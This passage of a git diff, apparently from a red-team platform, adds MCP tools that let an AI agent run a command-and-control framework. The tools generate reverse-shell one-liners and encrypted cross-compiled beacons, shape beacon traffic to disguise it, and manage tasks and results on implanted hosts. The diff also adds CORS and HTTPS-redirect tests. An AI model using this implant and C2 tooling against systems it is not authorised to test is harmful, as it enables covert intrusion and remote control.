task.Status == "cancelled" { + return makeC2Result(map[string]interface{}{"task": task}, nil) + } + select { + case <-time.After(500 * time.Millisecond): + case <-ctx.Done(): + return makeC2Result(nil, ctx.Err()) + } + } + return makeC2Result(nil, fmt.Errorf("timeout waiting for task completion")) + + case "list": + filter := database.ListC2TasksFilter{ + SessionID: getString(params, "session_id"), + ProjectID: mcpEffectiveProjectFilter(ctx, m.DB()), + Status: getString(params, "status"), + } + if limit := int(getFloat64(params, "limit")); limit > 0 { + filter.Limit = limit + } + tasks, err := m.DB().ListC2TasksForAccess(filter, c2ToolAccess(ctx)) + return makeC2Result(map[string]interface{}{"tasks": tasks, "count": len(tasks)}, err) + + case "cancel": + id := getString(params, "task_id") + err := m.CancelTask(id) + return makeC2Result(map[string]interface{}{"cancelled": err == nil}, err) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_payload — Payload 统一工具 +// ============================================================================ + +func registerC2PayloadTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListenPort int) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Payload, + Description: fmt.Sprintf(`C2 Payload 生成。通过 action 参数选择操作: +- oneliner: 生成单行 payload。kind 必须与监听器协议一致,否则会失败: + • tcp_reverse:默认仅支持 build 加密 Beacon;若监听器 config.allow_legacy_shell=true,才可用 kind: bash, nc, nc_mkfifo, python, perl, powershell。 + • http_beacon / https_beacon / websocket:仅 HTTP(S) Beacon 轮询,oneliner 只能用 kind: curl_beacon(脚本内用 bash+curl,与「tcp 的 bash」不同)。curl_beacon 返回串末尾含「 &」用于把整个 bash -c 放后台;若用 exec/execute 同步执行,必须整段原样复制(含末尾 &)。若删掉 &,内部 while 死循环占满前台,调用会一直阻塞到超时/杀进程。 + • 公网部署 tcp_reverse 请用 build 生成加密 Beacon,勿开启 allow_legacy_shell。 + • 省略 kind 时,会按监听器类型自动选第一个兼容类型(HTTP 系默认为 curl_beacon)。 +- build: 交叉编译 beacon 二进制。支持 http_beacon / https_beacon / websocket / tcp_reverse(tcp_reverse 植入端回连后先发魔数 CSB1,再经 AES-GCM 解密且校验 ImplantToken 后才登记会话)。 +依赖的监听器 bind_port 须避开本服务 Web 端口 %d(配置 server.port,与 c2_listener 描述一致),否则 Beacon 无法正确回连。`, webListenPort), + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: oneliner/build", "enum": []string{"oneliner", "build"}}, + "listener_id": map[string]interface{}{"type": "string", "description": "监听器 ID(必填)。oneliner 前请确认该监听器的 type,再选兼容的 kind"}, + "kind": map[string]interface{}{"type": "string", "description": "仅 action=oneliner 需要。tcp_reverse: bash|nc|nc_mkfifo|python|perl|powershell;http_beacon|https_beacon|websocket: 仅 curl_beacon"}, + "host": map[string]interface{}{"type": "string", "description": "oneliner/build 可选覆盖:非空则强制用作植入回连主机。留空时顺序为:监听器 callback_host(create/update 的 callback_host 参数写入)→ bind_host(0.0.0.0 时尝试本机对外 IP 探测)"}, + "os": map[string]interface{}{"type": "string", "description": "目标 OS(build): linux/windows/darwin", "default": "linux"}, + "arch": map[string]interface{}{"type": "string", "description": "目标架构(build): amd64/arm64/386/arm", "default": "amd64"}, + "sleep_seconds": map[string]interface{}{"type": "integer", "description": "默认心跳间隔(build)"}, + "jitter_percent": map[string]interface{}{"type": "integer", "description": "默认抖动百分比(build)"}, + }, + "required": []string{"action", "listener_id"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + listenerID := getString(params, "listener_id") + + switch action { + case "oneliner": + listener, err := m.DB().GetC2Listener(listenerID) + if err != nil { + return makeC2Result(nil, err) + } + if listener == nil { + return makeC2Result(nil, fmt.Errorf("listener not found")) + } + host := c2.ResolveBeaconDialHost(listener, getString(params, "host"), l, listenerID) + kind := c2.OnelinerKind(getString(params, "kind")) + if kind == "" { + compatible := c2.OnelinerKindsForListener(listener.Type) + if len(compatible) > 0 { + kind = compatible[0] + } + } + if !c2.IsOnelinerCompatible(listener.Type, kind) { + compatible := c2.OnelinerKindsForListener(listener.Type) + names := make([]string, len(compatible)) + for i, k := range compatible { + names[i] = string(k) + } + return makeC2Result(nil, fmt.Errorf("监听器类型 %s 不支持 %s,兼容类型: %v", listener.Type, kind, names)) + } + if err := c2.ValidateOnelinerForListener(listener, kind); err != nil { + return makeC2Result(nil, err) + } + input := c2.OnelinerInput{ + Kind: kind, + Host: host, + Port: listener.BindPort, + HTTPBaseURL: fmt.Sprintf("http://%s:%d", host, listener.BindPort), + ImplantToken: listener.ImplantToken, + } + oneliner, err := c2.GenerateOneliner(input) + if err != nil { + return makeC2Result(nil, err) + } + out := map[string]interface{}{ + "oneliner": oneliner, "kind": input.Kind, "host": host, "port": listener.BindPort, + } + if kind == c2.OnelinerCurl { + out["usage_note"] = "同步 exec/execute:整段原样执行(末尾须有「 &」)。去掉则 while 永不结束,工具会一直卡住。" + } + return makeC2Result(out, nil) + + case "build": + builder := c2.NewPayloadBuilder(m, l, "", "") + input := c2.PayloadBuilderInput{ + ListenerID: listenerID, + OS: getString(params, "os"), + Arch: getString(params, "arch"), + SleepSeconds: int(getFloat64(params, "sleep_seconds")), + JitterPercent: int(getFloat64(params, "jitter_percent")), + Host: strings.TrimSpace(getString(params, "host")), + } + result, err := builder.BuildBeacon(input) + if err != nil { + return makeC2Result(nil, err) + } + if principal, ok := authctx.PrincipalFromContext(ctx); ok { + _ = m.DB().RecordC2PayloadArtifact(filepath.Base(result.OutputPath), result.PayloadID, result.ListenerID, principal.UserID) + } + return makeC2Result(map[string]interface{}{ + "payload_id": result.PayloadID, "download_path": result.DownloadPath, + "os": result.OS, "arch": result.Arch, "size_bytes": result.SizeBytes, + }, nil) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_event — 事件查询工具 +// ============================================================================ + +func registerC2EventTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Event, + Description: "获取 C2 事件(上线/掉线/任务/错误),支持按级别/类别/会话/任务/时间过滤", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "level": map[string]interface{}{"type": "string", "description": "级别过滤: info/warn/critical"}, + "category": map[string]interface{}{"type": "string", "description": "类别过滤: listener/session/task/payload/opsec"}, + "session_id": map[string]interface{}{"type": "string", "description": "按会话过滤"}, + "task_id": map[string]interface{}{"type": "string", "description": "按任务过滤"}, + "since": map[string]interface{}{"type": "string", "description": "起始时间(RFC3339 格式,如 2025-01-01T00:00:00Z)"}, + "limit": map[string]interface{}{"type": "integer", "default": 50, "description": "返回数量"}, + }, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + filter := database.ListC2EventsFilter{ + Level: getString(params, "level"), + Category: getString(params, "category"), + ProjectID: mcpEffectiveProjectFilter(ctx, m.DB()), + SessionID: getString(params, "session_id"), + TaskID: getString(params, "task_id"), + Limit: int(getFloat64(params, "limit")), + } + if filter.Limit <= 0 { + filter.Limit = 50 + } + if since := getString(params, "since"); since != "" { + if t, err := time.Parse(time.RFC3339, since); err == nil { + filter.Since = &t + } + } + events, err := m.DB().ListC2EventsForAccess(filter, c2ToolAccess(ctx)) + return makeC2Result(map[string]interface{}{"events": events, "count": len(events)}, err) + }) +} + +func c2ToolAccess(ctx context.Context) database.RBACListAccess { + principal, ok := authctx.PrincipalFromContext(ctx) + if !ok { + return database.RBACListAccess{Scope: database.RBACScopeAssigned} + } + return database.RBACListAccess{UserID: principal.UserID, Scope: principal.ScopeFor("c2:read")} +} + +// ============================================================================ +// c2_profile — Malleable Profile 管理工具(新增) +// ============================================================================ + +func registerC2ProfileTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Profile, + Description: `C2 Malleable Profile 管理(控制 beacon 通信伪装)。通过 action 参数选择操作: +- list: 列出所有 Profile +- get: 获取 Profile 详情(需 profile_id) +- create: 创建 Profile(需 name,可选 user_agent/uris/request_headers/response_headers/body_template/jitter_min_ms/jitter_max_ms) +- update: 更新 Profile(需 profile_id) +- delete: 删除 Profile(需 profile_id)`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: list/get/create/update/delete", "enum": []string{"list", "get", "create", "update", "delete"}}, + "profile_id": map[string]interface{}{"type": "string", "description": "Profile ID(get/update/delete 需要)"}, + "name": map[string]interface{}{"type": "string", "description": "Profile 名称"}, + "user_agent": map[string]interface{}{"type": "string", "description": "User-Agent 字符串"}, + "uris": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "beacon 请求的 URI 列表"}, + "request_headers": map[string]interface{}{"type": "object", "description": "自定义请求头"}, + "response_headers": map[string]interface{}{"type": "object", "description": "自定义响应头"}, + "body_template": map[string]interface{}{"type": "string", "description": "响应体模板"}, + "jitter_min_ms": map[string]interface{}{"type": "integer", "description": "最小抖动(毫秒)"}, + "jitter_max_ms": map[string]interface{}{"type": "integer", "description": "最大抖动(毫秒)"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + id := getString(params, "profile_id") + + switch action { + case "list": + profiles, err := m.DB().ListC2Profiles() + return makeC2Result(map[string]interface{}{"profiles": profiles, "count": len(profiles)}, err) + + case "get": + profile, err := m.DB().GetC2Profile(id) + if err != nil { + return makeC2Result(nil, err) + } + if profile == nil { + return makeC2Result(nil, fmt.Errorf("profile not found")) + } + return makeC2Result(map[string]interface{}{"profile": profile}, nil) + + case "create": + profile := &database.C2Profile{ + ID: "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14], + Name: getString(params, "name"), + UserAgent: getString(params, "user_agent"), + BodyTemplate: getString(params, "body_template"), + JitterMinMS: int(getFloat64(params, "jitter_min_ms")), + JitterMaxMS: int(getFloat64(params, "jitter_max_ms")), + CreatedAt: time.Now(), + } + if uris, ok := params["uris"]; ok { + if arr, ok := uris.([]interface{}); ok { + for _, u := range arr { + if s, ok := u.(string); ok { + profile.URIs = append(profile.URIs, s) + } + } + } + } + if rh, ok := params["request_headers"]; ok { + if m, ok := rh.(map[string]interface{}); ok { + profile.RequestHeaders = make(map[string]string) + for k, v := range m { + profile.RequestHeaders[k], _ = v.(string) + } + } + } + if rh, ok := params["response_headers"]; ok { + if m, ok := rh.(map[string]interface{}); ok { + profile.ResponseHeaders = make(map[string]string) + for k, v := range m { + profile.ResponseHeaders[k], _ = v.(string) + } + } + } + if err := m.DB().CreateC2Profile(profile); err != nil { + return makeC2Result(nil, err) + } + return makeC2Result(map[string]interface{}{"profile": profile}, nil) + + case "update": + profile, err := m.DB().GetC2Profile(id) + if err != nil { + return makeC2Result(nil, err) + } + if profile == nil { + return makeC2Result(nil, fmt.Errorf("profile not found")) + } + if v := getString(params, "name"); v != "" { + profile.Name = v + } + if v := getString(params, "user_agent"); v != "" { + profile.UserAgent = v + } + if v := getString(params, "body_template"); v != "" { + profile.BodyTemplate = v + } + if v := int(getFloat64(params, "jitter_min_ms")); v > 0 { + profile.JitterMinMS = v + } + if v := int(getFloat64(params, "jitter_max_ms")); v > 0 { + profile.JitterMaxMS = v + } + if uris, ok := params["uris"]; ok { + if arr, ok := uris.([]interface{}); ok { + profile.URIs = nil + for _, u := range arr { + if s, ok := u.(string); ok { + profile.URIs = append(profile.URIs, s) + } + } + } + } + if rh, ok := params["request_headers"]; ok { + if mp, ok := rh.(map[string]interface{}); ok { + profile.RequestHeaders = make(map[string]string) + for k, v := range mp { + profile.RequestHeaders[k], _ = v.(string) + } + } + } + if rh, ok := params["response_headers"]; ok { + if mp, ok := rh.(map[string]interface{}); ok { + profile.ResponseHeaders = make(map[string]string) + for k, v := range mp { + profile.ResponseHeaders[k], _ = v.(string) + } + } + } + if err := m.DB().UpdateC2Profile(profile); err != nil { + return makeC2Result(nil, err) + } + return makeC2Result(map[string]interface{}{"profile": profile}, nil) + + case "delete": + err := m.DB().DeleteC2Profile(id) + return makeC2Result(map[string]interface{}{"deleted": err == nil}, err) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_file — 文件管理工具(新增) +// ============================================================================ + +func registerC2FileTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2File, + Description: `C2 文件管理。通过 action 参数选择操作: +- list: 列出会话的文件传输记录(需 session_id) +- get_result: 获取任务结果文件路径(截图等,需 task_id)`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: list/get_result", "enum": []string{"list", "get_result"}}, + "session_id": map[string]interface{}{"type": "string", "description": "会话 ID(list 需要)"}, + "task_id": map[string]interface{}{"type": "string", "description": "任务 ID(get_result 需要)"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + + switch action { + case "list": + sessionID := getString(params, "session_id") + if sessionID == "" { + return makeC2Result(nil, fmt.Errorf("session_id required")) + } + files, err := m.DB().ListC2FilesBySession(sessionID) + return makeC2Result(map[string]interface{}{"files": files, "count": len(files)}, err) + + case "get_result": + taskID := getString(params, "task_id") + task, err := m.DB().GetC2Task(taskID) + if err != nil { + return makeC2Result(nil, err) + } + if task == nil { + return makeC2Result(nil, fmt.Errorf("task not found")) + } + if task.ResultBlobPath == "" { + return makeC2Result(map[string]interface{}{"has_file": false, "task_id": taskID}, nil) + } + return makeC2Result(map[string]interface{}{ + "has_file": true, + "task_id": taskID, + "file_path": task.ResultBlobPath, + }, nil) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// 工具函数 +// ============================================================================ + +func getString(params map[string]interface{}, key string) string { + if v, ok := params[key]; ok { + if s, ok := v.(string); ok { + return s + } + } + return "" +} + +func getFloat64(params map[string]interface{}, key string) float64 { + if v, ok := params[key]; ok { + switch n := v.(type) { + case float64: + return n + case int: + return float64(n) + case string: + if f, err := strconv.ParseFloat(n, 64); err == nil { + return f + } + } + } + return 0 +} diff --git a/internal/app/c2_tools_test.go b/internal/app/c2_tools_test.go new file mode 100644 index 00000000..b24d2660 --- /dev/null +++ b/internal/app/c2_tools_test.go @@ -0,0 +1,69 @@ +package app + +import ( + "context" + "path/filepath" + "testing" + + "cyberstrike-ai/internal/authctx" + "cyberstrike-ai/internal/c2" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "go.uber.org/zap" +) + +func TestC2ListenerCreateInheritsConversationProject(t *testing.T) { + db, err := database.NewDB(filepath.Join(t.TempDir(), "c2-tools.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + user, err := db.CreateRBACUser("c2-agent", "C2 Agent", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + project, err := db.CreateProject(&database.Project{Name: "engagement"}) + if err != nil { + t.Fatal(err) + } + if err := db.AssignResourceToUser(user.ID, "project", project.ID); err != nil { + t.Fatal(err) + } + conversation, err := db.CreateConversation("project chat", database.ConversationCreateMeta{ProjectID: project.ID}) + if err != nil { + t.Fatal(err) + } + + principal := authctx.NewPrincipal(user.ID, user.Username, database.RBACScopeAssigned, map[string]bool{ + "c2:read": true, "c2:write": true, + }) + ctx := authctx.WithPrincipal(mcp.WithMCPConversationID(context.Background(), conversation.ID), principal) + server := mcp.NewServer(zap.NewNop()) + server.SetToolAuthorizer(mcpToolAuthorizer(db)) + registerC2Tools(server, c2.NewManager(db, zap.NewNop(), t.TempDir()), zap.NewNop(), 8080) + + result, _, err := server.CallTool(ctx, builtin.ToolC2Listener, map[string]interface{}{ + "action": "create", + "name": "tcp-reverse-2222", + "type": "tcp_reverse", + "bind_host": "0.0.0.0", + "bind_port": 2222, + }) + if err != nil || result == nil || result.IsError { + t.Fatalf("create listener result=%#v err=%v text=%q", result, err, toolResultText(result)) + } + + listeners, err := db.ListC2Listeners() + if err != nil { + t.Fatal(err) + } + if len(listeners) != 1 { + t.Fatalf("listener count=%d, want 1", len(listeners)) + } + if listeners[0].ProjectID != project.ID { + t.Fatalf("listener project_id=%q, want %q", listeners[0].ProjectID, project.ID) + } +} diff --git a/internal/app/cors_security_test.go b/internal/app/cors_security_test.go new file mode 100644 index 00000000..d58eebf4 --- /dev/null +++ b/internal/app/cors_security_test.go @@ -0,0 +1,105 @@ +package app + +import ( + "net/http" + "net/http/httptest" + "testing" + + "github.com/gin-gonic/gin" +) + +func TestCORSMiddlewareAllowsSameOriginAndRejectsForeignOrigin(t *testing.T) { + gin.SetMode(gin.TestMode) + router := gin.New() + router.Use(corsMiddleware(nil)) + router.GET("/test", func(c *gin.Context) { c.Status(http.StatusNoContent) }) + + same := httptest.NewRequest(http.MethodGet, "http://app.example/test", nil) + same.Host = "app.example" + same.Header.Set("Origin", "http://app.example") + sameW := httptest.NewRecorder() + router.ServeHTTP(sameW, same) + if sameW.Code != http.StatusNoContent || sameW.Header().Get("Access-Control-Allow-Origin") != "http://app.example" { + t.Fatalf("same-origin response = %d, allow-origin=%q", sameW.Code, sameW.Header().Get("Access-Control-Allow-Origin")) + } + + foreign := httptest.NewRequest(http.MethodGet, "http://app.example/test", nil) + foreign.Host = "app.example" + foreign.Header.Set("Origin", "https://evil.example") + foreignW := httptest.NewRecorder() + router.ServeHTTP(foreignW, foreign) + if foreignW.Code != http.StatusForbidden { + t.Fatalf("foreign-origin response = %d, want %d", foreignW.Code, http.StatusForbidden) + } +} + +func TestCORSMiddlewareAllowsBrowserExtensionWithoutConfiguration(t *testing.T) { + gin.SetMode(gin.TestMode) + router := gin.New() + router.Use(corsMiddleware(nil)) + router.POST("/api/auth/login", func(c *gin.Context) { c.Status(http.StatusNoContent) }) + + req := httptest.NewRequest(http.MethodOptions, "https://server.example/api/auth/login", nil) + req.Host = "server.example" + req.Header.Set("Origin", "chrome-extension://abcdefghijklmnopabcdefghijklmnop") + req.Header.Set("Access-Control-Request-Method", http.MethodPost) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusNoContent { + t.Fatalf("preflight response = %d, want %d", w.Code, http.StatusNoContent) + } + if got := w.Header().Get("Access-Control-Allow-Origin"); got != "chrome-extension://abcdefghijklmnopabcdefghijklmnop" { + t.Fatalf("allow-origin = %q", got) + } +} + +func TestCORSMiddlewareRejectsInvalidExtensionOrigins(t *testing.T) { + gin.SetMode(gin.TestMode) + for _, origin := range []string{ + "chrome-extension://too-short", + "chrome-extension://qrstuvwxyzabcdefqrstuvwxyzabcdef", + "chrome-extension://abcdefghijklmnopabcdefghijklmnop:8443", + "moz-extension://abcdefghijklmnopabcdefghijklmnop", + } { + t.Run(origin, func(t *testing.T) { + router := gin.New() + router.Use(corsMiddleware(nil)) + router.GET("/test", func(c *gin.Context) { c.Status(http.StatusNoContent) }) + + req := httptest.NewRequest(http.MethodGet, "https://server.example/test", nil) + req.Host = "server.example" + req.Header.Set("Origin", origin) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + if w.Code != http.StatusForbidden { + t.Fatalf("response = %d, want %d", w.Code, http.StatusForbidden) + } + }) + } +} + +func TestCORSMiddlewareRejectsUnsafeConfiguredEntries(t *testing.T) { + gin.SetMode(gin.TestMode) + for _, configured := range []string{ + "*", + "null", + "https://trusted.example/extra", + "https://trusted.example?trusted=true", + } { + t.Run(configured, func(t *testing.T) { + router := gin.New() + router.Use(corsMiddleware([]string{configured})) + router.GET("/test", func(c *gin.Context) { c.Status(http.StatusNoContent) }) + + req := httptest.NewRequest(http.MethodGet, "https://server.example/test", nil) + req.Host = "server.example" + req.Header.Set("Origin", "https://trusted.example") + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + if w.Code != http.StatusForbidden { + t.Fatalf("response = %d, want %d", w.Code, http.StatusForbidden) + } + }) + } +} diff --git a/internal/app/main_server_http_redirect.go b/internal/app/main_server_http_redirect.go new file mode 100644 index 00000000..7c7b74d7 --- /dev/null +++ b/internal/app/main_server_http_redirect.go @@ -0,0 +1,213 @@ +package app + +import ( + "bufio" + "context" + "crypto/tls" + "errors" + "fmt" + "net" + "net/http" + "strconv" + "sync" + "time" + + "go.uber.org/zap" +) + +// peekedConn 在已预读首字节后仍将连接交给 net/http 或 crypto/tls。 +type peekedConn struct { + net.Conn + r *bufio.Reader +} + +func (c *peekedConn) Read(p []byte) (int, error) { + return c.r.Read(p) +} + +// oneConnListener 供 http.Server.Serve 处理单条 TCP 连接(含 keep-alive)。 +type oneConnListener struct { + conn net.Conn + addr net.Addr + once sync.Once +} + +func (l *oneConnListener) Accept() (net.Conn, error) { + var c net.Conn + l.once.Do(func() { + c = l.conn + l.conn = nil + }) + if c == nil { + return nil, net.ErrClosed + } + return c, nil +} + +func (l *oneConnListener) Close() error { return nil } +func (l *oneConnListener) Addr() net.Addr { return l.addr } + +// httpServerForTLSConn 从已有 Server 复制可服务字段,用于已握手 TLS 连接上的 HTTP 服务。 +// 不能复制整个 http.Server(内含 atomic/noCopy 字段)。 +func httpServerForTLSConn(src *http.Server) *http.Server { + return &http.Server{ + Handler: src.Handler, + DisableGeneralOptionsHandler: src.DisableGeneralOptionsHandler, + ReadTimeout: src.ReadTimeout, + ReadHeaderTimeout: src.ReadHeaderTimeout, + WriteTimeout: src.WriteTimeout, + IdleTimeout: src.IdleTimeout, + MaxHeaderBytes: src.MaxHeaderBytes, + ConnState: src.ConnState, + ErrorLog: src.ErrorLog, + BaseContext: src.BaseContext, + ConnContext: src.ConnContext, + } +} + +func isTLSHandshakeRecord(b byte) bool { + return b == 0x16 +} + +func newHTTPToHTTPSRedirectHandler(httpsPort int) http.Handler { + return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + host := r.Host + if h, _, err := net.SplitHostPort(host); err == nil { + host = h + } + var target string + if httpsPort == 443 { + target = fmt.Sprintf("https://%s%s", host, r.URL.RequestURI()) + } else { + target = fmt.Sprintf("https://%s:%d%s", host, httpsPort, r.URL.RequestURI()) + } + http.Redirect(w, r, target, http.StatusPermanentRedirect) + }) +} + +func portFromListenAddr(addr string) int { + _, portStr, err := net.SplitHostPort(addr) + if err != nil { + return 443 + } + p, err := strconv.Atoi(portStr) + if err != nil || p <= 0 { + return 443 + } + return p +} + +func ensureMainTLSConfigCerts(mode mainTLSMode, tlsConf *tls.Config, certFile, keyFile string) (*tls.Config, error) { + if mode != mainTLSFromFiles { + return tlsConf, nil + } + if tlsConf == nil { + tlsConf = &tls.Config{MinVersion: tls.VersionTLS12} + } + if len(tlsConf.Certificates) > 0 { + return tlsConf, nil + } + cert, err := tls.LoadX509KeyPair(certFile, keyFile) + if err != nil { + return nil, err + } + tlsConf.Certificates = []tls.Certificate{cert} + return tlsConf, nil +} + +type mainServerMux struct { + ln net.Listener + httpsSrv *http.Server + redirectSrv *http.Server + logger *zap.Logger +} + +func newMainServerMux(ln net.Listener, httpsSrv *http.Server, httpsPort int, logger *zap.Logger) *mainServerMux { + return &mainServerMux{ + ln: ln, + httpsSrv: httpsSrv, + redirectSrv: &http.Server{Handler: newHTTPToHTTPSRedirectHandler(httpsPort), ReadHeaderTimeout: 10 * time.Second}, + logger: logger, + } +} + +func (m *mainServerMux) Serve() error { + for { + conn, err := m.ln.Accept() + if err != nil { + if errors.Is(err, net.ErrClosed) { + return http.ErrServerClosed + } + return err + } + go m.handleConn(conn) + } +} + +func (m *mainServerMux) handleConn(raw net.Conn) { + if err := raw.SetReadDeadline(time.Now().Add(10 * time.Second)); err != nil { + _ = raw.Close() + return + } + br := bufio.NewReader(raw) + b, err := br.Peek(1) + if err != nil { + _ = raw.Close() + return + } + _ = raw.SetReadDeadline(time.Time{}) + + pc := &peekedConn{Conn: raw, r: br} + ocl := &oneConnListener{conn: pc, addr: raw.LocalAddr()} + + if isTLSHandshakeRecord(b[0]) { + m.serveHTTPS(pc, raw.LocalAddr()) + return + } + if err := m.redirectSrv.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) { + m.logger.Debug("HTTP 重定向连接处理结束", zap.Error(err)) + } +} + +// serveHTTPS 在已嗅探为 TLS 的连接上完成握手,再按 ALPN 走 HTTP/2 或 HTTP/1.1。 +// 不能对同一 http.Server 并发调用 Serve(TLSConfig!=nil),否则握手/ALPN 会异常(浏览器 ERR_SSL_PROTOCOL_ERROR)。 +func (m *mainServerMux) serveHTTPS(pc *peekedConn, localAddr net.Addr) { + tlsConn := tls.Server(pc, m.httpsSrv.TLSConfig) + handCtx, cancel := context.WithTimeout(context.Background(), 15*time.Second) + defer cancel() + if err := tlsConn.HandshakeContext(handCtx); err != nil { + m.logger.Debug("TLS 握手失败", zap.Error(err)) + _ = pc.Close() + return + } + + srv := m.httpsSrv + if srv.TLSNextProto != nil { + proto := tlsConn.ConnectionState().NegotiatedProtocol + if fn := srv.TLSNextProto[proto]; fn != nil { + fn(srv, tlsConn, srv.Handler) + return + } + } + + plain := httpServerForTLSConn(srv) + ocl := &oneConnListener{conn: tlsConn, addr: localAddr} + if err := plain.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) { + m.logger.Debug("HTTPS 连接处理结束", zap.Error(err)) + } +} + +func (m *mainServerMux) Shutdown(ctx context.Context) error { + _ = m.ln.Close() + var err1, err2 error + if m.httpsSrv != nil { + err1 = m.httpsSrv.Shutdown(ctx) + } + if m.redirectSrv != nil { + err2 = m.redirectSrv.Shutdown(ctx) + } + if err1 != nil { + return err1 + } + return err2 +} diff --git a/internal/app/main_server_http_redirect_test.go b/internal/app/main_server_http_redirect_test.go new file mode 100644 index 00000000..99037f29 --- /dev/null +++ b/internal/app/main_server_http_redirect_test.go @@ -0,0 +1,150 @@ +package app + +import ( + "crypto/tls" + "io" + "net" + "net/http" + "net/http/httptest" + "strconv" + "testing" + + "cyberstrike-ai/internal/config" + + "golang.org/x/net/http2" +) + +func TestNewHTTPToHTTPSRedirectHandler(t *testing.T) { + t.Parallel() + tests := []struct { + name string + httpsPort int + host string + uri string + wantTarget string + }{ + { + name: "non standard port", + httpsPort: 8080, + host: "127.0.0.1:8080", + uri: "/login?next=/", + wantTarget: "https://127.0.0.1:8080/login?next=/", + }, + { + name: "standard port", + httpsPort: 443, + host: "example.com:80", + uri: "/", + wantTarget: "https://example.com/", + }, + } + for _, tt := range tests { + tt := tt + t.Run(tt.name, func(t *testing.T) { + t.Parallel() + h := newHTTPToHTTPSRedirectHandler(tt.httpsPort) + req := httptest.NewRequest(http.MethodGet, "http://"+tt.host+tt.uri, nil) + req.Host = tt.host + rec := httptest.NewRecorder() + h.ServeHTTP(rec, req) + if rec.Code != http.StatusPermanentRedirect { + t.Fatalf("status = %d, want %d", rec.Code, http.StatusPermanentRedirect) + } + if got := rec.Header().Get("Location"); got != tt.wantTarget { + t.Fatalf("Location = %q, want %q", got, tt.wantTarget) + } + }) + } +} + +func TestIsTLSHandshakeRecord(t *testing.T) { + t.Parallel() + if !isTLSHandshakeRecord(0x16) { + t.Fatal("expected TLS handshake record") + } + if isTLSHandshakeRecord('G') { + t.Fatal("GET should not be TLS") + } +} + +func TestServerHTTPRedirectEnabled(t *testing.T) { + t.Parallel() + disabled := false + enabled := true + if config.ServerHTTPRedirectEnabled(nil) { + t.Fatal("nil config should disable redirect") + } + if !config.ServerHTTPRedirectEnabled(&config.ServerConfig{TLSEnabled: true}) { + t.Fatal("HTTPS without explicit flag should enable redirect") + } + if config.ServerHTTPRedirectEnabled(&config.ServerConfig{TLSEnabled: true, TLSHTTPRedirect: &disabled}) { + t.Fatal("explicit false should disable redirect") + } + if !config.ServerHTTPRedirectEnabled(&config.ServerConfig{TLSEnabled: true, TLSHTTPRedirect: &enabled}) { + t.Fatal("explicit true should enable redirect") + } + if config.ServerHTTPRedirectEnabled(&config.ServerConfig{}) { + t.Fatal("plain HTTP should not redirect") + } +} + +func TestMainServerMuxHTTPRedirectAndHTTPS(t *testing.T) { + cert, err := generateMainServerSelfSignedCert() + if err != nil { + t.Fatalf("generate cert: %v", err) + } + handler := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { + _, _ = io.WriteString(w, "ok") + }) + srv := &http.Server{Handler: handler, TLSConfig: &tls.Config{ + MinVersion: tls.VersionTLS12, + Certificates: []tls.Certificate{cert}, + }} + if err := http2.ConfigureServer(srv, &http2.Server{}); err != nil { + t.Fatalf("configure http2: %v", err) + } + + ln, err := net.Listen("tcp", "127.0.0.1:0") + if err != nil { + t.Fatalf("listen: %v", err) + } + defer ln.Close() + + mux := newMainServerMux(ln, srv, portFromListenAddr(ln.Addr().String()), nil) + go func() { _ = mux.Serve() }() + + client := &http.Client{ + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true, MinVersion: tls.VersionTLS12}, + }, + CheckRedirect: func(_ *http.Request, _ []*http.Request) error { + return http.ErrUseLastResponse + }, + } + addr := ln.Addr().String() + + httpResp, err := client.Get("http://" + addr + "/") + if err != nil { + t.Fatalf("http get: %v", err) + } + _ = httpResp.Body.Close() + if httpResp.StatusCode != http.StatusPermanentRedirect { + t.Fatalf("http status = %d, want %d", httpResp.StatusCode, http.StatusPermanentRedirect) + } + if got := httpResp.Header.Get("Location"); got != "https://127.0.0.1:"+strconv.Itoa(portFromListenAddr(addr))+"/" { + t.Fatalf("Location = %q", got) + } + + 